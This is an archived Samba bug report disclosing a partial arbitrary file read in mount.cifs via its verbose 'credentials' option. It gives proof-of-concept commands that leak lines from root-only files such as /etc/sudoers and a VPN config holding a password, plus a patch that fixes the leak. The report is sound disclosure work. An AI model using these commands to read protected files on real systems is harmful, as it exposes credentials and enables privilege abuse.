From: samba-bugs@samba.org
To: cifs-qa@samba.org
Subject: [Bug 15026] New: Partial arbitrary file read via mount.cifs
Date: Mon, 21 Mar 2022 11:03:53 +0000 [thread overview]
Message-ID: <bug-15026-10630@https.bugzilla.samba.org/> (raw)
https://bugzilla.samba.org/show_bug.cgi?id=15026
Bug ID: 15026
Summary: Partial arbitrary file read via mount.cifs
Product: CifsVFS
Version: 5.x
Hardware: All
OS: All
Status: NEW
Severity: normal
Priority: P5
Component: user space tools
Assignee: jlayton@samba.org
Reporter: jbe@improsec.com
QA Contact: cifs-qa@samba.org
CC: sfrench@samba.org
Target Milestone: ---
Partial arbitrary file read via mount.cifs
The following was tested on cifs-utils version 6.14.
The "credentials" option of mount.cifs binary allow for partial arbitrary file
disclosure when the verbose flag is set. When a credential line is invalid, the
following code is reached:
571 static int open_cred_file(char *file_name,
572 struct parsed_mount_info *parsed_info)
573 {
...
637 case CRED_UNPARSEABLE:
638 if (parsed_info->verboseflag)
639 fprintf(stderr, "Credential formatted "
640 "incorrectly: %s\n",
641 temp_val ? temp_val : "(null)");
Because of how credential files are formatted, any part of a line after an
equal sign in an invalid line is printed. Such lines can be found in sensitive
files:
secure_path and rights in /etc/sudoers:
$ ls -l /etc/sudoers
-r--r----- 1 root root 670 Apr 20 2021 /etc/sudoers
$ sudo /usr/sbin/mount.cifs -v //127.0.0.1/share /mnt/share -o
credentials=/etc/sudoers
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly:
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (ALL:ALL) ALL
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (ALL:ALL) ALL
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Password for root@//127.0.0.1/share:
mount.cifs kernel mount options:
ip=127.0.0.1,unc=\\127.0.0.1\share,user=root,pass=********
mount error(111): could not connect to 127.0.0.1Unable to find suitable
address.
Passwords in /etc/openfortivpn/config:
$ ls -l /etc/openfortivpn/config
-rw------- 1 root root 154 Aug 28 2021 /etc/openfortivpn/config
$ sudo /usr/sbin/mount.cifs -v //127.0.0.1/share /mnt/share -o
credentials=/etc/openfortivpn/config
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: vpn.example.org
Credential formatted incorrectly: 443
Credential formatted incorrectly: vpnuser
Credential formatted incorrectly: VPNpassw0rd
Password for root@//127.0.0.1/share:
mount.cifs kernel mount options:
ip=127.0.0.1,unc=\\127.0.0.1\share,user=root,pass=********
mount error(111): could not connect to 127.0.0.1Unable to find suitable
address.
Note that either sudo rights on the mount.cifs binary or an entry in fstab are
needed to perform the read.
A possible mitigation is to get rid of the token value when printing the error
in verbose mode:
From: Jeffrey Bencteux <jbe@improsec.com>
Date: Sat, 19 Mar 2022 13:41:15 -0400
Subject: [PATCH] fix verbose message of credentials option
When supposed credential line is invalid, the verbose message prints
part of it. This lead to information disclosure when the
credentials file given is sensitive and contains '=' signs.
Signed-off-by: Jeffrey Bencteux <jbe@improsec.com>
---
mount.cifs.c | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/mount.cifs.c b/mount.cifs.c
index 32521a7..82358a3 100644
--- a/mount.cifs.c
+++ b/mount.cifs.c
@@ -637,8 +637,7 @@ static int open_cred_file(char *file_name,
case CRED_UNPARSEABLE:
if (parsed_info->verboseflag)
fprintf(stderr, "Credential formatted "
- "incorrectly: %s\n",
- temp_val ? temp_val : "(null)");
+ "incorrectly\n");
break;
}
}
--
2.33.0
--
You are receiving this mail because:
You are the QA Contact for the bug.
next reply other threads:[~2022-03-21 11:04 UTC|newest]
Thread overview: 5+ messages / expand[flat|nested] mbox.gz Atom feed top
2022-03-21 11:03 samba-bugs [this message]
2022-03-21 12:13 ` [Bug 15026] Partial arbitrary file read via mount.cifs samba-bugs
2022-03-21 12:42 ` samba-bugs
2022-03-21 13:49 ` samba-bugs
2022-03-21 16:36 ` samba-bugs
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=bug-15026-10630@https.bugzilla.samba.org/ \
--to=samba-bugs@samba.org \
--cc=cifs-qa@samba.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.